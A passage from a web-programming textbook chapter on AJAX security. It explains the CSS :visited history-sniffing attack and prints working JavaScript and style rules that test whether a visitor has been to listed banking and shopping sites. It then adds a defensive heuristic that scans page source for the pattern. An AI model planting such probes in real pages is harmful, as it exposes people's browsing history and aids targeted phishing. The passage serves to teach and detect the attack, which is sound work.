AJAX - The Complete Reference


PART II


Chapter 7: Security Concerns


Hackers would like to know what sites you have visited. As it turns out, if you visit the
hacker’s site or a site they have compromised, they can tell fairly easily whether or not you
have visited a site they are interested in. They do this by exploiting the subtle information
leakage from the visited link indicator. Recall that a browser automatically distinguishes
between visited and nonvisited links, by default giving visited links a different style, usually
the color purple. The hacker will take a list of sites, either embedded in the page or
fetched, and check them one at a time:

var stealhistorysites = new Array(
    "http://www.google.com/", "http://ajaxref.com/ch7/history.html",
    "https://www.wellsfargo.com/", "http://www.bankofamerica.com/",
    "http://www.washingtonmutual.com/", "http://www.amazon.com/",
    "https://home.americanexpress.com/", "https://www.paypal.com/");

/* list every URL that checkHistory() reports as visited */
for (var i = 0; i < stealhistorysites.length; i++)
    if (checkHistory(stealhistorysites[i]))
        responseOutput.innerHTML += stealhistorysites[i] + "<br />";

To check whether you have been there, they first set style rules that define how
the visited and nonvisited links will look.

<style type="text/css">
a.stealhistory:link{color:#FF0000}
a.stealhistory:visited{color:#00FF00}
</style>

Then the hack script will use DOM methods to add each tested URL into the page in a
hidden manner and see what its rendered style is. If a link displays as visited, the hacker
knows that you have been there since you last purged your history; if not, you either
purge history often or you haven’t been there.

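function checkHistory(url)
{
    var found = false;
    /* build a hidden link that carries the class styled above */
    var link = document.createElement("a");
    link.className = "stealhistory";
    link.href = url;
    link.appendChild(document.createTextNode("stealhistory"));
    link.style.visibility = "hidden";
    document.body.appendChild(link);

    /* getStyle() is not shown on this page; it is assumed to return the
       element's computed value for the named CSS property */
    var color = getStyle(link, "color").toLowerCase();
    document.body.removeChild(link);
    /* the :visited rule sets #00FF00, reported in either notation */
    if (color == "rgb(0, 255, 0)" || color == "#00ff00")
        found = true;
    return found;
}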

A sample history stealing example is shown in Figure 7-12 and can be found at
http://ajaxref.com/ch7/history.html.
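
The three steps above (a distinct :visited rule, a script-created link carrying that class, and a read-back of its rendered style) leave a recognizable pattern in page source. The following is an added example, not code from the book: a heuristic static check a reviewer could run over page source. The names visitedClasses and auditPage and both sample pages are constructed for illustration.

```javascript
// Added example (not from the book): static heuristic for history-probing pages.
// Function names and both sample pages are constructed for illustration.

// Class names that get their own :visited rule, e.g. a.stealhistory:visited{...}
function visitedClasses(source) {
  const found = new Set();
  for (const m of source.matchAll(/\.([A-Za-z_][\w-]*):visited\s*\{/g)) found.add(m[1]);
  return [...found];
}

// Flag a class only when all three steps described in the text are present:
// a :visited rule, a script-created anchor given that class, and a style read-back.
function auditPage(source) {
  const createsAnchor = /createElement\(\s*["']a["']\s*\)/i.test(source);
  const readsStyle = /getComputedStyle|currentStyle|getStyle\s*\(/.test(source);
  const findings = [];
  for (const cls of visitedClasses(source)) {
    const assigned = new RegExp(
      `(className\\s*=|classList\\.add\\()\\s*["']${cls}["']`).test(source);
    if (createsAnchor && assigned && readsStyle) findings.push(cls);
  }
  return findings;
}

// Constructed sample: condensed form of the pattern shown in this section.
const PROBE_PAGE = `
<style>a.stealhistory:link{color:#FF0000} a.stealhistory:visited{color:#00FF00}</style>
<script>
var link = document.createElement("a");
link.className = "stealhistory";
var color = getStyle(link, "color");
</script>`;

// Constructed sample: ordinary visited-link styling with no read-back.
const BENIGN_PAGE = `
<style>a.nav:visited{color:purple}</style>
<a class="nav" href="/docs">Docs</a>
<script>document.title = "Docs";</script>`;

console.log("probe page findings:", auditPage(PROBE_PAGE));
console.log("benign page findings:", auditPage(BENIGN_PAGE));
```

Because it is a text heuristic, a match is a prompt for manual review rather than proof, and obfuscated or dynamically loaded script will not be caught.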